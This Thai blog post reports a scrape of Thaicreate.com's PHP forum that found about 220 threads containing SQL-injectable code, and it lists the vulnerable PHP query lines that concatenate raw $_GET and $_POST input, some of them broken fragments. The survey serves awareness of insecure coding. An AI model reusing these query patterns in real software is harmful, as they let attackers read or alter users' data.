SQL Injection vulnerabilities in Thaicreate PHP questions

          สืบเนื่องจาก SQL injections vulnerabilities in Stack Overflow PHP questions มีคนเขียนเว็บไปดึงข้อมูลจากเว็บ Stack Overflow เพื่อหาว่า คนตั้งคำถามที่เกี่ยวกับ PHP มีการวางโค้ดที่มีช่องโหว่ SQL Injection เยอะแค่ไหน โดยเก็บเป็นสถิติสวยงาม ผมจึงมีไอเดียที่อยากจะลองทำแบบเดียวกันนี้กับเว็บไซต์ที่มีการถามตอบคำถามที่เกี่ยวกับ PHP ในประเทศไทยบ้าง ซึ่งที่นึกได้ก็มีอยู่เว็บไซต์หนึ่งที่น่าจะเป็นชุมชนที่ใหญ่ในประเทศไทยที่มีการถามตอบเรื่องที่เกี่ยวกับการเขียนโปรแกรมหลากหลายภาษาหนึ่งในนั้นก็รวมถึง PHP ที่เป็นเป้าหมายอยู่ด้วย ผมจึงเขียนสคริป Python ง่ายๆ ไปดึงข้อมูลจากเว็บ Thaicreate.com ห้อง PHP เพื่อหาว่าคนถามตอบปัญหาที่เกี่ยวกับ PHP นั้นมีการวางโค้ดที่มีช่องโหว่ SQL Injection ที่นำ User input ไปต่อกับ SQL Query Statement โดยไม่มีการตรวจสอบอยู่เยอะแค่ไหน โดยเลือกเพียง 30 หน้าล่าสุดจากทั้งหมด โดยผมใช้ Regular expression จาก SQL injections vulnerabilities in Stack Overflow PHP questions และได้ทำการปรับแต่งเพิ่มเติมในส่วนของการตรวจสอบ SQL Injection อีกนิดหน่อยครับ

ผลลัพธ์ที่ได้คือจาก 30 หน้าล่าสุดพบการถามตอบปัญหาที่โค้ดมีช่องโหว่ SQL Injection ประมาณ 220+ กระทู้

$result=$mysqli->query("SELECT * FROM `users` WHERE `id` = '$_POST[id]'");  
$strSQL = "SELECT * FROM project2 WHERE namepro = '".$_GET["item"]."'";  
$strSQL = "SELECT *,SUM(money) as tomoney FROM donate WHERE namepro = '".$_GET["item"]."'";  
$sql_statement = "INSERT INTO revenueother( dateother, typeother, moneyother, paybyother) VALUES ('" .$_POST["dateo"] . "', '" .$_POST["typeo"] . "', '" .$_POST["moneyo"] . "', '" .$_POST["paybyo"] . "')";  
$pay_ot = "SELECT job.ser_id,job.tech_id,service.ser_id,service.sertype_id,ser_date FROM job,service,service_type WHERE service.ser_id=job.ser_id and service_type.sertype_id=service.sertype_id  AND ser_date BETWEEN '$strStartDate' and '$strEndDate' and job.tech_id = '".$_GET["tech_id"]."'";  
//$q="SELECT * FROM tbl_event WHERE date(event_start)>='".$_GET['start']."'  ";  
$strSQL = "INSERT INTO user_addcomment (src, dst, date_on , src_station , time_on , car_no , comment , name , tel , email , other) VALUES ('".$_POST["src"]."','".$_POST["dst"]."','".$_POST["date_on"]."', '".$_POST["src_station"]."','".$_POST["time_on"]."','".$_POST["car_no"]."','".$_POST["comment"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["other"]."')";  
$query = sprintf('select * from orders where orders_id=%s',s($con,$_GET['rid']));  
$query3 = sprintf('update product set pro_amount="%s" where pro_no="%s" ',s($con,$_POST['amts']),s($con,$_POST['id_edit']));  
$strSQL =  "SELECT * FROM user WHERE user_id = ".$_GET["uID"];  
$sql="select * from set_table  where  term_ids='".$_GET[term_ids]."' ";  
$sql="INSERT INTO `time_table` (`tb_id`, `tb_subject`, `tb_time`, `tb_time_min`, `tb_time_max`, `tb_col`, `tb_week`, `tb_date`, `tb_setting`, `term_ids`) VALUES (NULL, '".$_POST[subject]."', '".$ex[1]."', '".$ex1[1]."', '".$ex_time_max."', '".$_POST[cols_table]."', '".$ex[0]."', '', '0', '".$_POST[set_term]."');";  
$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']); //นั  
mysql_query('UPDATE board SET board_views=board_views+1 WHERE board_id=' . $_GET['id']); //Update จำนวนผู้เข้าชมของกระทู้นั้น  
$rs_cg = mysql_query('SELECT forum_name,forum_id FROM forum WHERE forum_id=' . $_GET['id']);  
$strSQL = "SELECT * FROM yeumkuendata WHERE userid = '".$_GET["userid"]."' AND statusyk = 'ยังไม่คืน' ";  
$strSQL2 = "SELECT permission FROM memberdata WHERE userid = '".$_GET["userid"]."'";  
$strSQL = "SELECT * FROM tbreserv WHERE ReservID = '".$_GET["ID"]."' ";  
$strSQLlogin = "SELECT * FROM admin WHERE user = '".trim($_POST['username'])."'  
$strSQLlogin = "SELECT * FROM personal WHERE p_card = '".trim($_POST['username'])."'  
$sql = "select * From send Where 1 and DAY(date_send)='".$_GET["dd"]."' and MONTH(date_send)='".$_GET["mm"]."' and status_s='yes' ORDER BY sendNo DESC";  
$sql="SELECT * FROM  tbl_language WHERE id='".$_GET['id']."'";  
$query = "update tbl_language set name='".$_GET['languages']."' where id='".$_GET['id']."';  
1. $sql="SELECT * FROM  tbl_language WHERE id='".$_GET['id']."'"; การ where ที่ id เดาว่าผลลัพธ์ มันน่าจะมีค่าเดียว หรือมันได้กี่ค่า ตอบตัวเองครับ  
$strSQL = "SELECT * FROM customer WHERE CustomerID = '".$_GET["CusID"]."' ";  
$sql="insert into on_off(on1,off1) values(".$_POST["on1"].",".$_POST["off1"].")";  
$strSQL = "SELECT * FROM memberdata WHERE MONTH(memregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(memregisday) = '".$_GET['txtKeyword4']."' and status = 'USER' ";  
$strSQL2 = "SELECT * FROM bookdata WHERE MONTH(bookregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(bookregisday) = '".$_GET['txtKeyword4']."'  ";  
$strSQL3 = "SELECT * FROM yeumkuendata WHERE MONTH(dateborrow) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(dateborrow) = '".$_GET['txtKeyword4']."'  ";  
$strSQL = "SELECT * FROM memberdata WHERE (memberdata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' )  ";  
$strSQL2 = "SELECT * FROM bookdata WHERE (bookdata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' )  ";  
$strSQL3 = "SELECT * FROM yeumkuendata WHERE (yeumkuendata LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' )  ";  
$strSQL = "SELECT * FROM memberdata WHERE MONTH(memregisday) BETWEEN '".$_GET['txtKeyword2']."' and '".$_GET['txtKeyword3']."' AND YEAR(memregisday) = '".$_GET['txtKeyword4']."'  ";  
$strSQL = "INSERT INTO repost (strdate,enddate,room,name,tel) VALUES ('".$_POST["date1"]."', '".$_POST["date2"]."','".$_POST["txtRoom"]."','".$_POST["txtName"]."' ,'".$_POST["tel"]."' )";  
$query = "SELECT * FROM test WHERE tags LIKE '%$_GET[value]%' order by id desc";  
$query = "SELECT * FROM test WHERE tags LIKE '%".($_GET[value]).",%' order by id desc";  
$strSQL = "INSERT INTO member (User,Password,Name,LastName,Gender,Address,Province,ZipCode,Tel,Email,employee,SID,Active) VALUES ('".$_POST[txtUser]."','".$_POST[txtPass]."', '".$_POST[txtName]."','".$_POST[txtLastName]."' ,'".$_POST[rdoGender]."','".$_POST[txtAddress]."', '".$_POST[txtProvince]."','".$_POST[txtZipCode]."','".$_POST[txtTel]."', '".$_POST[txtEmail]."','USER','employee','".session_id()."','No')";  
$strSQL = "SELECT * FROM user WHERE username = '".trim($_POST['username'])."' ";  
$strSQL = "INSERT INTO user (username,password,lastname,address,tel,email) VALUES ('".$_POST["username"]."', '".$_POST["password"]."','".$_POST["lastname"]."','".$_POST["address"]."' ,'".$_POST["tel"]."' ,'".$_POST["email"]."')";  
$query ="SELECT  id_name,date0,total FROM `service` where m = '".$_GET["month"]."' AND Y ='".$_GET["year"]."'";  
$sqldel="Delete From stock_tb_module Where iduser='".$_GET['deluser']."'";  
$seek="Select iduser from stock_tb_module Where iduser='".$_POST['user']."'";  
$sqlsave="INSERT INTO stock_tb_module(iduser,typeuser) Values('".$_POST['user']."','".$_POST['type']."')";  
$sql="Select stock_tb_module.*,tb_user.nameuser,tb_user.surname From stock_tb_module INNER JOIN tb_user ON stock_tb_module.iduser=tb_user.iduser Where stock_tb_module.iduser='".$_GET['user']."'";  
$sql="UPDATE stock_tb_module SET typeuser='03' Where iduser='".$_GET['id']."'";  
$sql="DELETE From stock_tb_module Where iduser='".$_GET['id']."'";  
$sql="Select * From stock_tb_kind_type where kindid='".$_GET['kindid']."' Order by kindtypeid";  
$sqldetail="INSERT INTO stock_tb_beg_master_sub(nobeg,kindtypeid,total,forbeg,user_name) Value('".$_GET['bk']."','".$_SESSION['sess_kindid'][$kid]."','".$beg[$i]."','".$for[$i]."','$user_name')";  
$sqlk="Select stock_tb_kind_type.*,stock_tb_unit.unitname From stock_tb_kind_type INNER JOIN stock_tb_unit ON stock_tb_kind_type.unitid=stock_tb_unit.unitid Where kindtypeid='".$_GET['id']."'";  
$sql = "SELECT *  FROM saler  WHERE sale_id LIKE '%".$_POST["search"]."%'";  
$sql = "SELECT *  FROM saler  WHERE sale_id LIKE '%".$_POST["keyword"]."%'";  
$strSQL = "SELECT * FROM order_details WHERE pro_id='".$_GET["txtKeyword"]."'";  
$strSQL = "INSERT INTO use_addcomment (src, dst, date_on , stc_station , time_on , car_no , comment , name , tel , email , other) VALUES ('".$_POST["src"]."','".$_POST["dst"]."','".$_POST["date_on"]."', '".$_POST["src_station"]."','".$_POST["time_on"]."','".$_POST["car_no"]."','".$_POST["comment"]."','".$_POST["name"]."','".$_POST["tel"]."','".$_POST["email"]."','".$_POST["other"]."',)";  
$strSQL = "SELECT * FROM bookdata inner join typedata on bookdata.typeid = typedata.typeid WHERE (namebook LIKE '%".$_GET["txtKeyword"]."%' or numberid LIKE '%".$_GET["txtKeyword"]."%' )  ";  
$strSQL = "SELECT * FROM memberdata inner join majordata on memberdata.majorid = majordata.majorid WHERE userid = '".$_GET["userid"]."' ";  
$strSQL = "SELECT * FROM yeumkuendata WHERE userid = '".$_GET['userid']."' ";  
$strSQL = "SELECT * FROM picture WHERE (projectid LIKE '%".$_GET["txtKeyword"]."%' )";  
$strSQL = "SELECT * FROM picture WHERE (projectid LIKE '%".$_GET["txtKeyword"]."%' )"; // เดิม  
$strSQL = "SELECT * FROM picture WHERE projectid LIKE '%".$_GET["txtKeyword"]."%' "; // เปลี่ยน  
$strSQL = "SELECT * FROM picture WHERE projectid LIKE '%".$_GET["txtKeyword"]."%' ";  
select * from tabientb where (tabienno1 and tabienno2) LIKE '%$_POST[search]%'  
$sql = " select * from tabientb where CONCAT(tabienno1, tabienno2) LIKE '%$_POST[search]%' ";  
$sql = " select * from tabientb where (tabienno LIKE '%$_POST[search]%') AND (tabienno2 LIKE '%$_POST[search]%') ";  
select * from tabientb where tabienno1 LIKE '%enno2 LIKE '%$_POST[search]%'  
$strSQL = "INSERT INTO `member`(`username`,`password`,`name`,`lname`) VALUES ('".$_POST['username']."',  
$strSQL = "INSERT INTO memberdata (userid,password,sex,titlename,fname,lname,majorid,email,mempic,status,memregisday) VALUES ('".$_POST["userid"]."',  
$strSQL = "SELECT * FROM orders WHERE OrderID = '".$_GET["OrderID"]."' ";  
$strSQL = "SELECT * FROM student WHERE (class='".$_GET["txtKeyword"]."')";  
$strSQL = "SELECT * FROM yeumkuendata WHERE ykid = '".trim($_POST['ykid'])."' ";  
$strSQL = "INSERT INTO yeumkuendata (userid,numberid,dateborrow,datesetreturn,statusyk) VALUES ('".$_POST["userid"]."',  
$query2 = sprintf('select * from department where d_id=%s',s($con,$_GET['dept']));  
$query2 = sprintf('select * from departmentp inner join personnel on departmentp.ds_id = personnel.ds_id  where departmentp.ds_id=%s',s($con,$_GET['dept']));  
$sel_part = "select * from tblpart where PartID = '".$_POST['chkorder'][$i]."'";  
$sql="select b.pro_name,b.coler,b.pro_year,a.cat_name from category as a inner join product as b on a.cat_id=b.cat_id inner join branch as c on b.id_b=c.id_b where c.id_b='".$_GET['id_b']."' GROUP BY pro_name,coler,pro_year";  
$num_car=mysql_num_rows(mysql_query("select pro_name,coler,pro_year from product where pro_name='".$result1['pro_name']."' and id_b='".$_GET['id_b']."'"))  
$num_car=mysql_num_rows(mysql_query("select pro_name,coler,pro_year from product where pro_name='".$result1['pro_name']."' and coler='".$result1['coler']."' and pro_year='".$result1['pro_year']."' and id_b='".$_GET['id_b']."'"))  
$strSQL = "SELECT * FROM book WHERE dates='".$_POST["myDate1"]."' and btime= '".$_POST["mytime"]."' and status='1' rid = '".$_POST["myRoom"]."' ";  
$strSQLday1 = "SELECT SUM(`INV# AMOUNT`) as Total FROM `orderheader` WHERE `INV# DATE` LIKE '%20160901%' AND `ORDER DATE` LIKE '%20160901%' AND `SALESMAN` LIKE '43406'  "; /* WHERE (TERM_NO LIKE '%".$_GET["txtKeyword"]."%') */  
$query_rs_type="SELECT * FROM product_type WHERE gr_id ='".$_GET['lsgroup']."' ";  
$strSQL = "SELECT * FROM calendar WHERE ((year = '".trim($_POST['year'])."' and month = '".trim($_POST['month'])."'  
$strSQL = "INSERT INTO calendar (title,color,year,month,day,time_start,time_end,Email) VALUES ('".$_POST["title"]."','".$_POST["color"]."','".$_POST["year"]."','".$_POST["month"]."',  
$sql="insert into ems (ems) values ('".$_POST['ems']."')";  
$strSQL = "SELECT  * FROM customer  WHERE (CustomerID LIKE '%".$_GET["txtKeyword"]."%' or Email LIKE '%".$_GET["txtKeyword"]."%' )";  
$strSQLdel = "DELETE FROM tblmyfiles WHERE ID = '".$_GET["ID"]."'";  
$sqltxtQty = "SELECT product_amount FROM product WHERE product_id ='".$_POST["txtProductID"]."'" ;  
$strSQL = "SELECT * FROM files WHERE (Name='".$_GET["txtKeyword"]."' or keyword='".$_GET["txtKeyword"]."' )";  
$strSQL = "SELECT * FROM files WHERE (Name LIKE '%".$_GET["txtKeyword"]."%' or keyword LIKE '%".$_GET["txtKeyword"]."%' )";  
$sql="UPDATE assessment_kpi SET score='".$_POST['score'][$i]."', head='".$_POST['head'][$i]."' where id_kpi='".$_POST['id'][$i]."' ";  
$sql = $sql="UPDATE assessment_kpi SET score='".$_POST['score'][$i]."', head='".$_POST['head'][$i]."' where id_kpi='".$_POST['id'][$i]."' ";  
$strSQL = "INSERT INTO Scan (RFID,Date,Time,Late) VALUES ('".$_POST["txtStudentID"]."','".date("Y-m-d")."' ,'".date("H:i:s")."','".$timeDiff."')";  
$sql="Update member set Password='".$_POST["txtPass"]."',Name='".$_POST["txtName"]."',LastName='".$_POST["txtLastName"]."',Gender='".$_POST["rdoGender"]."',Address='".$_POST["txtAddress"]."',Province='".$_POST["txtProvince"]."',ZipCode='".$_POST["txtZipCode"]."',Tel='".$_POST["txtTel"]."',Email='".$_POST["txtEmail"]."' where MemberID=$id";  
$stmt=$db->prepare("delete from multiupload where id ='".$_GET['id']."'");  
$strSQL = "SELECT * FROM location_marker WHERE Locationname_id ='$_GET[Locationname_id]'";  
$strSQL = "SELECT * FROM location_areaname WHERE Locationname_id ='$_GET[Locationname_id]'";  
$strSQL = "SELECT * FROM location_polylinename WHERE Locationname_id ='$_GET[Locationname_id]'";  
$rs = mysql_query("SELECT * FROM tb_applyjob WHERE jid = $_GET[jid]");  
$strSQL = "SELECT * FROM family WHERE family_name_th = '".$_POST["txtfamily_name_th"]."' ";  
$strSQL = "SELECT asset FROM tbl_asset WHERE 1 AND asset = '".$_POST["sCusID"]."'";  
$query2 = sprintf('update orders set orders_status=2 where orders_id=%s',s($con,$_POST['orid']));  
$strSQL = "SELECT * FROM animal WHERE animal_id = '".$_GET["CusID"]."' ";  
$sql = "insert into uploadimags(name,date,image) value('".$_POST['Name']."','".date('Y-m-d H:i:s')."','".$new_images."')";  
$sqll = "select * from uploadimags where name = '".$_POST['Name']."'";  
$query1="SELECT * from tag_work_building_2  where id = '$_GET[id]'";  
$strSQL = "INSERT INTO calendar (title,year,month,day,time_start,time_end) VALUES ('".$_POST["title"]."','".$_POST["year"]."','".$_POST["month"]."',  
$query = sprintf('select * from event where id_event="%s"',s($con,$_GET['idv']));  
select * from event where id_event= $_GET['id_event']  
$strSQL = "SELECT * FROM customer WHERE 1 AND Customer_Code = '".$_POST["sCusID"]."' ";  
$sql="select * from tabletb where id='$_GET[id]'";  
พอจะ $sql="select * from tabletb where id='$_GET[id]'"; ก็ไม่มีค่า $_GET[id] ส่งมาค่ะ  
$sql_cate="select * from category where id='$_GET[id]'";  
$sql = "select * from table_name where id = '$_GET['id']' ";  
$sql = "select * from employee where name like '%{$_POST['itemname']}%'  or duty like '%{$_POST['itemname']}%'";  
$strSQL = "SELECT * FROM packing WHERE ProductID = '".$_GET["FilesID"]."' " ;  
$strSQL = "SELECT * FROM flavor WHERE ProductID = '".$_GET["FilesID"]."' ";  
///$strSQL = "SELECT * FROM  idp3  WHERE (day LIKE '%".$_GET["txtKeyword"]."%' or  day LIKE '%".$_GET["txtKeyword"]."%' )";  
$strSQL = "SELECT * FROM tbl_item,rentorder WHERE (tbl_item.TERM_NO LIKE '%".$_GET["txtKeyword"]."%' and rentorder.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";  
$strSQL = "SELECT * FROM tbl_item WHERE (tbl_item.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";  
$strSQL2 = "SELECT * FROM rentorder WHERE (rentorder.TERM_NO LIKE '%".$_GET["txtKeyword"]."%')";  
$strSQL = "SELECT * FROM number WHERE username ='".trim($_POST['usernamelogin'])."'  
$strSQL2 = "INSERT INTO files (PicName,FilesName) VALUES ('".$_POST["txtPicName"]."','".$_FILES["filUpload"]["name"]."')";  
$strSQL2 = "INSERT INTO files (ID,PicName,FilesName) VALUES ('".$insertID."',".$_POST["txtPicName"]."','".$_FILES["filUpload"]["name"]."')"; // เพิ่ม Field ID ใน table file  
$res = $mysqli->query("SELECT * FROM article WHERE article_id =".$_GET['u']);  
$query2= sprintf ('select * from product where pro_no="%s" ',s($con,$_GET['id_del']));  
$query = sprintf('delete from product where pro_no="%s" ',s($con,$_GET['id_del']));  
$q="SELECT * FROM car WHERE date(timego)>='".date("Y-m-d",$_GET['start'])."'  ";  
$objQuery1 = "SELECT * FROM Register where $ddlSelect LIKE '%".$_POST["txtKeyword"]."%'" ;  
; //*** Insert Record ***// $objConnect = mysql_connect(localhost","adtec","adtec1234") or die("Error Connect to Database"); $objDB = mysql_select_db("adtec"); mysql_query("SET character_set_results=utf8"); mysql_query("SET character_set_client=utf8"); mysql_query("SET character_set_connection=utf8"); $strSQL = "INSERT INTO album"; $strSQL .="(AlbumName,AlbumShot,Details,Male,Female,Tim,one,two,tre,four,five,note) VALUES ('".$_POST["txtAlbumName"]."','".$fileName."','". $_POST["Namer"]."','". $_POST["M"]."','". $_POST["F"]."','". $_POST["more"]."','". $_POST["textfield4"]."','".$_POST["textfield5"]."','".$_POST["textfield6"]."','".$_POST["textfield7"]."','".$_POST["textfield8"]."','".$_POST["textfield"]."')"; $objQuery = mysql_query($strSQL); mysql_close($objConnect); } ?> 
แก้ตรง $sql_data = "update tb_order set paystatus='$_POST[paystatus]' where refid = '$_POST[refid2]'"; รึป่าวครับ..  
mysql_query("INSERT INTO contact (id,message,name,phone,email,dateregist,timeregist) values('', '$_POST[message]','$_POST[name]','$_POST[phone]','$_POST[email]','$e_date', '$etime')") or die ("Cannot Add Database");  
$strSQL = "SELECT * FROM customer WHERE 1 AND CustomerID = '".$_POST["sCusID"]."' OR Email = '".$_POST["eMail"]."' ";  
$sort = mysqli_query ($con,"SELECT order_no FROM choose where Ad_num =".$_GET['pno'] );  
$strSQL = "SELECT * FROM product WHERE Supplier_ID = '".$_GET["Supplier_ID "]."' ";  
$strSQL = "SELECT * FROM radio_member WHERE Username = '".trim($_POST['txtUsername'])."' ";  
$strSQL = "INSERT INTO radio_member (Username,Password,Name) VALUES ('".$_POST["txtUsername"]."',  
$resultms = mysql_query("update ms set actqty = actqty-'".$_POST["qty$i"]."' where shopcode='".$_GET["shopcode"]."' AND  productid = '".$_POST["productid$i"]."'");  
$strCHECKms = "SELECT * FROM  ms WHERE shopcode = '".$shop."' AND productid = '".$_POST["productid$i"]."'";  
$resultoshop = mysql_query("update ms set actqty = actqty + '".$_POST["qty$i"]."' where shopcode='".$shop."' AND  productid = '".$_POST["productid$i"]."'");  
$resultcheckstock = mysql_query("update  checkstock set status = 'Y' where shopcode='".$_GET["shopcode"]."' AND  productid = '".$_POST["productid$i"]."'");  
insert into ตรงนี้ เอาค่า $_POST['province_id][$i] ไปเก็บ  
$sql="select * from  time_sample where team='".$_POST['Require']."' and day_='".$_POST['day_']."' order by id desc";  
$sql="select * from sample_user where id_staff='".$arr['id_staff']."' and day_='".$_POST['day_']."'";  
$sqlup ="update stock set stock = stock - '".$_POST["txt_stock"]."' where `p_id`= '".$_POST["txt_id"]."'";  
$sqlup ="update stock set stock = stock - '".$_POST["txt_stock"][$i]."' where `p_id`= '".$_POST["txt_id"][$i]."'";  
$strSQL2 = "SELECT * FROM orders_detail WHERE o_id = '".$_GET["o_id"]."' ";  
//$strSQL = "SELECT * FROM products,bom WHERE (Pro_ID LIKE '%".$_GET["txtKeyword"]."%')";  
$strSQL = "INSERT INTO files (Name,FilesName) VALUES ('".$_POST["txtName"]."','".$_FILES["filUpload"]["name"]."')";  
$strSQL = "INSERT INTO files (Name,FilesName,upload) VALUES ('".$_POST["txtName"]."','".$_FILES["filUpload"]["filUpload2"]["name"]."')";  
$strSQL = "SELECT * FROM bk_room_type WHERE room_type_name = '".trim($_POST['room_type_name'])."'";  
$strSQL = "SELECT * FROM bk_building WHERE building_name = '".trim($_POST['building_name'])."'";  
$strSQL = "SELECT * FROM bk_janitor WHERE janitor_name = '".trim($_POST['janitor_name'])."'";  
$strSQL = "SELECT * FROM bk_member_title WHERE titlename = '".trim($_POST['titlename'])."'";  
$strSQL = "SELECT * FROM bk_member_majorname WHERE majorname = '".trim($_POST['majorname'])."'";  
Result=mysql_query("INSERT INTO tb_example (Booking_ID,Province_ED) VALUES ('".$Booking_ID."','".$_POST['Province_ID'][$i]."')");  
$strSQL = "SELECT * FROM customer WHERE (billing LIKE '%".$_GET["txtCredit"]."%' AND billing LIKE '%".$_GET["txtCash"]."%' )";  
$sql_up = "update product set ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]', Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";  
$sql_up = "update product set Picture='$file_name' where ProductID='$_GET[ProductID]'";  
$sql_up = "update product set  Picture='$file_name',ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]',Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";  
$sql_update = "update product set Picture='$file_name' where ProductID='$_GET[ProductID]'";  
$sql_up = "update product set  Picture='$file_name',ProductCode='$_POST[txtProductCode]', ProductName='$_POST[txtProductName]',Description='$_POST[txtDescription]', Price='$_POST[txtPrice]',PriceNormal='$_POST[txtPriceNormal]', PriceSend='$_POST[txtPriceSend]',Stock='$_POST[txtStock]', Promotion='$_POST[rdoPromotion]',New='$_POST[rdoNew]' where ProductID='$_GET[ProductID]'";  
$query = "SELECT * FROM amount_cus where = " .$_GET['edit_id'];  
$strSQL = "INSERT INTO conven (convenID,dormitoryID,coname,costatus) VALUES (NULL,'$convenroomid','".$_POST["conven"][$i]."','T')";  
$StrSql = "Select * from picupload WHERE ServiceCode LIKE '%".$_GET["txtKeyword"]."%'";  
$strSQL = "SELECT * FROM history_med WHERE (id_run LIKE '%".$_POST["recvid"]."%'  )";  
$strSQL = "SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense  = '".$_GET["item"]."' ORDER BY carlicense ASC";  
$strSQL ="SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense  = '".$_GET["item"]."' ORDER BY carlicense ASC";  
$strSQL ="SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_POST["item"]."' ORDER BY carlicense ASC";  
$result= mysql_query("SELECT MAX(milesin) as max_milesin FROM ots_table WHERE carlicense = '".$_POST["item"]."' ORDER BY carlicense ASC");  
echo $strSQL = "UPDATE article SET topic = '".trim($_POST['topic'])."'  
$strSQL = "SELECT * FROM member WHERE Username = '".trim($_POST['txtUsername'])."' and Password = '".trim($_POST['txtPassword'])."' and Active = 'Yes' ";   
SELECT * FROM ( select * from personal where p_id=".($_GET['p_id']*1).") per  
$strSQL = "SELECT * FROM tbRoom WHERE ID_Room = '".$_GET["RoomID"]."' ";  
$q="SELECT *  FROM doctable WHERE name='หมอหนึ่ง' ORDER by date(timego)>='".$_GET['start']."'  ";  
$q="SELECT *  FROM doctable WHERE name='$roo_id' ORDER by date(timego)>='".$_GET['start']."'  ";  
$q="SELECT *  FROM doctable WHERE id='$roo_id' ORDER by date(timego)>='".$_GET['start']."'  ";  
$q="SELECT * FROM doctable WHERE date(timego)>='".$_GET['start']."'  ";  
$q="SELECT * FROM doctable WHERE name='$roo_id' ORDER by date(timego)>='".$_GET['start']."'  ";  
$sqld = "DELETE FROM brand WHERE id='".$_GET['did']."'";  
$result = mysql_query("update product set qty = qty - '".$_POST["txtQty$i"]."' where ProductID = '".$_POST["txtProductID2$i"]."'");  
$strSQL3 = "SELECT * FROM tb_ps WHERE PS_id = '".$_GET['id']."' ";  
$strSQL2 = "SELECT * FROM tb_ps WHERE PS_sale LIKE '%".$_GET['txtkeyword']."%' ";  
$sql = "UPDATE files SET filestatus = '$status' where FileID = '".$_POST['FileID']."'";  
mysql_query("UPDATE member SET m_view=(m_view+1) WHERE m_id = '".$_GET["id"]."' AND m_line = '".$_GET["line"]."'" );  
$sqls="SELECT * FROM member where m_id ='".$_GET[id]."' AND m_line = '".$_GET[line]."'";  
$sqls="SELECT * FROM member where m_id ='".$_GET[id]."' AND m_line = '".$_GET[line]."' ";  
$strSQL = ("INSERT INTO history_med(id_person,name_med,value_med) VALUES('"."','".$_POST["xx"]."','".$_POST["xy"]."')") ;  
$q="select * from member where k_name like'$_GET[name]%' and k_age like'$_GET[age]%' and k_sex like '$_GET[sex]%' and k_address like '$_GET[s]%' and k_date like '$_GET[k_date]%'";  
$sql ='SELECT * FROM member WHERE u_ser = "'.$_POST['i_ur'].'"';  
$strSQL2 = "UPDATE product SET product_qty = product_qty - ".$rs['product_qty']." WHERE product_id = '".$_REQUEST['product_id']."'";  
$sql3 = "select * from send where send_id = '$_GET[user_send_id]'";  
$sql = " insert into book( book_id, book_name , book_detail, typebook_id) VALUES ( null, '$bookname', '$_POST[book_detail]', '$_POST[typebook_id]');";  
$sql = " insert into send ( send_id, user_id, book_id , subject , send_key, send_date, send_time) VALUES ( null, '$sender', '$res' , '$_POST[subject]','$key', '$today' , '$time');";  
$sql = " insert into send_detail ( send_id , user_id , vision , open , approve) VALUES ( '$res2', '$user_send[$i]', '0', '0' ,'$_POST[approve]' );";  
$sql = " insert into book( book_id, book_name, book_pdf , book_detail, typebook_id) VALUES ( null, '$bookname','$bookpdf', '$_POST[book_detail]', '$_POST[typebook_id]');";  
$sql = " insert into send ( send_id, user_id, book_id , subject ,send_key, send_date, send_time) VALUES ( null, '$sender', '$res' , '$_POST[subject]','$key' ,'$today' , '$time');";  
$sql = " insert into send_detail ( send_id , user_id , vision , open , approve) VALUES ( '$res2', '$user_send[$i]', '$vision[$i]', '0' ,'$_POST[approve]' );";  
$sql1 = "select * from court where court_time = '".$_GET["item"]."'";  
$CardSQL = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd ASC";  
$First = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd ASC LIMIT 0,1";  
$Last = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' ORDER BY member.IDstd DESC LIMIT 0,1";  
$strSQL =" UPDATE request_color a JOIN printer_color b ON a.RequestPC = b.Printer_Color_ID SET b.ColorTotalNumber = '$ColorBalance1'  WHERE a.RequestID = '".$_GET["id"]."' ";  
$strSQL1 = "UPDATE meeting_list SET mstatus = 'S' where id = '".$_GET["id"]."' ";  
$CardSQL = "SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' LIMIT 0, 6";  
SELECT member.*, profile.IDnumber, profile.dbirth, profile.mbirth, profile.ybirth FROM member LEFT JOIN profile ON member.IDstd = profile.IDstd WHERE member.class = '".$_POST["class"]."' AND member.room = '".$_POST["room"]."' AND member.yearin = '".$_POST["yearin"]."' LIMIT 0, 6  
